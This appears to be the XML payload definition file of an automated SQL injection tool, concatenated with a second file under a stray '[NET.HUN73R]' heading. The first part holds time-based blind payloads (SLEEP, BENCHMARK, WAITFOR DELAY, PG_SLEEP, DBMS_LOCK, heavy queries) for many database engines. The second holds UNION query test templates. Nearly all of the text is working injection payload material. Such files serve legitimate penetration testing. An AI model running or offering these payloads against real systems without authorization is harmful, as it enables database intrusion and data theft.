    <test>        <title>MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (bool)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>        <request>            <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (ELT)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 time-based blind - Parameter replace</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->    <test>        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>        <request>            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>SQLite > 2.0 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>        <request>            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,3</clause>        <where>3</where>        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>        <!-- Untested -->    <test>        <title>HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- End of time-based boolean tests - Parameter replace -->
    <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->    <test>        <title>MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>        <request>            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>            <test>        <title>HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause --></root>

[NET.HUN73R]

union_query

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- UNION query tests -->    <test>        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>    <test>        <title>Generic UNION query (NULL) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
